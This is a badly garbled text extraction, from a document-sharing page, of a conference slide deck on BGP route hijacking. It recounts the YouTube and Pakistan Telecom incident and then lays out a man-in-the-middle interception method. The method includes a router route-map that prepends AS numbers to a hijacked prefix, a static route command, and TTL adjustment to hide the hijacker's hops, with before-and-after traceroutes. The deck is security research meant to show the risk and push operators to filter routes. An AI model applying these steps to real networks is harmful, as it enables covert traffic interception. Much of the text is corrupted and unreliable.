Upload
calperniausa
View
232
Download
0
Embed Size (px)
Citation preview
8/13/2019 Border Gateway Protocol Interception
1/31
8/13/2019 Border Gateway Protocol Interception
2/31
8/13/2019 Border Gateway Protocol Interception
3/31
8/13/2019 Border Gateway Protocol Interception
4/31
8/13/2019 Border Gateway Protocol Interception
5/31
8/13/2019 Border Gateway Protocol Interception
6/31
8/13/2019 Border Gateway Protocol Interception
7/31
8/13/2019 Border Gateway Protocol Interception
8/31
8/13/2019 Border Gateway Protocol Interception
9/31
8/13/2019 Border Gateway Protocol Interception
10/31
8/13/2019 Border Gateway Protocol Interception
11/31
8/13/2019 Border Gateway Protocol Interception
12/31
8/13/2019 Border Gateway Protocol Interception
13/31
8/13/2019 Border Gateway Protocol Interception
14/31
8/13/2019 Border Gateway Protocol Interception
15/31
0 C0! outu3e (i)ack Saga8 ouTu3e announces 4 /refi"esB
% A C1K, C 0, C , and t9o C s % The C is 0! 64 14 0C8 #akistan:s go$ern'ent decides to 3lock ouTu3e8 #akistan Teleco' internall nails u/ a 'ore s/ecific route
? 0! 64 14 0C @ out of ouTu3e:s C to null0 ?the routers
discard interface@8 So'eho9 redists fro' static 3g/, then to #&&58 H/strea' /ro$ider sends routes to e$er one elseF8 Most of the net no9 goes to #akistan for ouTu3e, gets
nothingO8 ouTu3e res/onds 3 announcing 3oth the C and t9o 'ore
s/ecific C 4s, 9ith /artial success8 #&&5 turns off #akistan Teleco' /eering t9o hours later 8 to 4 'inutes after9ard, glo3al 3g/ ta3le is clean again
8/13/2019 Border Gateway Protocol Interception
16/31
#akistan o$t Notice
8/13/2019 Border Gateway Protocol Interception
17/31
+f InterestFI# (i)acking *o
8 Hn-official e$ent at NAN+ conference8 5e test securit of Internet routing
infrastructure
8 Eecent e"ercisesB %(i)acked 1 0 0 0C!B K0P success %(i)acked 1 6 0 0 0C16B K4P success
% Atte'/ted to announce net9orks longer than CB fro' C 4 do9n to C 9ith coo/eration oflarge &DN:s 0P successful o$erall
8/13/2019 Border Gateway Protocol Interception
18/31
Eouting Securit Is &o'/licated8 No ans9er et, due to lack of chain of trust fro' I&ANN
on do9n8 =5eakest link> /ro3le'B Hntil everyone filters everyone
perfectly , this door is still o/en8 *est /ractice toda is =Alerting> s ste's that look for
rogue announce'ents ?#(AS, EI#G M ASN, Eenes s,etc@
8 Eegister our AS and our /refi" in EIE ?no i''ediateeffect, 3ut e$entuall so'eone 9ill use the'@
8 No anon 'it % if ou hi)ack, e$er one kno9s it:s ou?due to AS-#AT(@
8 If things still 9ork, 9ho co'/lains7
8/13/2019 Border Gateway Protocol Interception
19/31
(o9 To Eesol$e A (i)acking
8 +nce rogue announce'ent isidentified, 9ork 3egins &ontact the
u/strea's and screa' %Ma take 'inutes, hours ?if ou are
outu3e-siQed@, or /ossi3l da s
8 A3out as eas as getting DDoSsto//ed ?or not@
8/13/2019 Border Gateway Protocol Interception
20/31
5hat This Means
8 Eootkits R 0da rogue announce'ents Man-in-'iddle attacks, 9ith our clues a//lied
% No need for three-9a -handshake 9hen ou:re in-line % Nearl in$isi3le e"/loitation /otential, glo3all8 Gnd/oint enu'eration - direct disco$er of 9ho
and 9hat our net9ork talks to
8 &an 3e acco'/lished glo3all , an -to-an8 (o9 9ould ou kno9 if this isn:t ha//ening right
no9 to our traffic at DG &+N7
8/13/2019 Border Gateway Protocol Interception
21/31
* # MITM (i)ack &once/t
8 5e originate the route like 9e al9a s did % 5in through usual 'eans ?/refi" length, shorter as-
/ath 9C se$eral origin /oints, etc@8
=5in> is so'e definition of ='ost of the internet choosesour route>
8 5e return the /ackets so'eho9 % &oordinating deli$er 9as non-tri$ial
% V/nCtunnel in$ol$e untena3le coordination at target8 Then it clicked % use the Internet itself as re/l
/ath, 3ut ho97
8/13/2019 Border Gateway Protocol Interception
22/31
* # MITM Setu/
1 Traceroute ; /lan re/l /ath to targetNote the ASN:s seen to9ards target fro'
traceroute ; 3g/ ta3le on our router A//l as-/ath /re/ends na'ing each of
the ASN:s intended for re/l /ath
Nail u/ static routes to9ards the ne"t-ho/ of the first AS in re/l /ath4 Done
8/13/2019 Border Gateway Protocol Interception
23/31
* # MITM % irst +3ser$e
Eando' Hser ASN 100
Target ASN 00
AS 0
AS10
AS 0
AS60
AS 0
AS40
ASN 00 originates10 10 0 0C , sends
announce'ents to AS 0and AS 0
Internet is con$erged
to9ards $alid route
Vie9 of or9ardingInfor'ation *ase ? I*@ for
10 10 0 0C aftercon$erging
8/13/2019 Border Gateway Protocol Interception
24/31
* # MITM % #lan re/l /ath
Attacker ASN 100
Target ASN 00
AS 0
AS10
AS 0
AS60
AS 0
AS40
ASN 100:s I* sho9s route for10 10 00 0C $ia AS10
5e then 3uild our as-/ath /re/end list toinclude AS 10, 0, and 00
8/13/2019 Border Gateway Protocol Interception
25/31
* # MITM % Setu/ Eoutes
Attacker ASN 100
Target ASN 00
AS 0
AS10
AS 0
AS60
AS 0
AS40
10 10 0 0C is announced 9ith a route-'a/B
route-map hijacked permit 10 match ip address prefix-list jacked set as-path prepend 10 20 200
Then, install static route in AS100 for10 10 0 0C to AS10:s linkip route 10.10.220.0 255.255.255.0 4.3.2.1
8/13/2019 Border Gateway Protocol Interception
26/31
Anon 'Qing The (i)acker
8 5e ad)ust TTL of /ackets in transit8 Gffecti$el
8/13/2019 Border Gateway Protocol Interception
27/31
5ithout TTL ad)ust'ent
2 12.87.94.9 !" 7018# 4 msec 4 msec 8 msec
3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 4 msec 4 %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 8 msec 4 msec 8 msec 5 192.205.35.42 !" 7018# 4 msec 8 msec 4 msec ( cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 24 msec 1( msec 28 msec 7 cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 28 msec 28 msec 8 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 9 208.175.194.10 !" 35(1# 28 msec 32 msec 32 msec 10 colo-(9-31-40-107.pilosoft.com &(9.31.40.107' !" 2((27# 32 msec 28 msec 28 msec 11 t%e2-3-103.ar1.n c3.us.nla er.net &(9.31.95.97' !" 443(# 32 msec 32 msec 32 msec 12 &missin% from trace/ 198.32.1(0.134 exchan%e point' 13 t%e1-2.fr4.ord.lln+.net &(9.28.171.193' !" 22822# 32 msec 32 msec 40 msec 14 )e(.fr3.ord.lln+.net &(9.28.172.41' !" 22822# 3( msec 32 msec 40 msec 15 t%e1-3.fr4.sjc.lln+.net &(9.28.171.((' !" 22822# 84 msec 84 msec 84 msec 1( )e5.fr3.sjc.lln+.net &(9.28.171.209' !" 22822# 9( msec 9( msec 80 msec 17 t%e1-1.fr4.lax.lln+.net &(9.28.171.117' !" 22822# 88 msec 92 msec 92 msec 18 t%e2-4.fr3.las.lln+.net &(9.28.172.85' !" 22822# 9( msec 9( msec 100 msec 19 s+itch.%e3-1.fr3.las.lln+.net &208.111.17(.2' !" 22822# 84 msec 88 msec 88 msec 20 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 84 msec 88 msec 88 msec 21 ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec 22 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 88 msec 88 msec 88 msec 23 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 84 msec 84 msec
8/13/2019 Border Gateway Protocol Interception
28/31
5ith TTL Ad)ust'ents
2 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec 3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 8 msec 4 %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 4 msec 8 msec 4 msec 5 192.205.35.42 !" 7018# 8 msec 4 msec 8 msec ( cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 1( msec 12 msec 7 cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 32 msec 32 msec 8 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 9 208.175.194.10 !" 35(1# 32 msec 32 msec 32 msec 10 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 88 msec 88 msec 84 msec 11 ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec
12 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 84 msec 84 msec 88 msec 13 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 88 msec 88 msec
8/13/2019 Border Gateway Protocol Interception
29/31
&o'/are +riginal * # ; Eoute #ath
ijacked
2 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec 3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 8 msec
4 %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 4 msec 8 msec 4 msec 5 192.205.35.42 !" 7018# 8 msec 4 msec 8 msec ( cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 1( msec 12 msec 7 cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 32 msec 32 msec 8 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 9 208.175.194.10 !" 35(1# 32 msec 32 msec 32 msec 10 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 88 msec 88 msec 84 msec 11 ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec 12 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 84 msec 84 msec 88 msec 13 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 88 msec 88 msec
ri%inal
2 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec
3 t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 8 msec 8 msec 8 msec 4 12.122.99.17 !" 7018# 8 msec 4 msec 8 msec 5 12.8(.15(.10 !" 7018# 12 msec 8 msec 4 msec ( t%e1-3.fr4.sjc.lln+.net &(9.28.171.((' !" 22822# (8 msec 5( msec (8 msec 7 )e5.fr3.sjc.lln+.net &(9.28.171.209' !" 22822# 5( msec (8 msec 5( msec 8 t%e1-1.fr4.lax.lln+.net &(9.28.171.117' !" 22822# (4 msec (4 msec 72 msec 9 t%e2-4.fr3.las.lln+.net &(9.28.172.85' !" 22822# (8 msec 72 msec 72 msec 10 s+itch.%e3-1.fr3.las.lln+.net &208.111.17(.2' !" 22822# (0 msec (0 msec (0 msec 11 %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# (0 msec (0 msec (0 msec
12 ((.209.(4.85 !" 23005# (4 msec (0 msec (0 msec 13 %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# (0 msec (4 msec (0 msec 14 acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# (0 msec (0 msec (0 msec
8/13/2019 Border Gateway Protocol Interception
30/31
In conclusion
8 5e learned that an ar3itrar /refi" can 3ehi)acked, 9ithout 3reaking end-to-end
8 5e sa9 it can ha//en nearl in$isi3l8 5e noted the * # as-/ath does re$eal
the attacker 8
Shields u/ filter our custo'ers
8/13/2019 Border Gateway Protocol Interception
31/31
Thanks ; #raise
8 eli" Lindner 8 Ua *eale
8 Dan 2a'insk8 Defcon S/eaker oons ; Staff 8 Todd Hnder9ood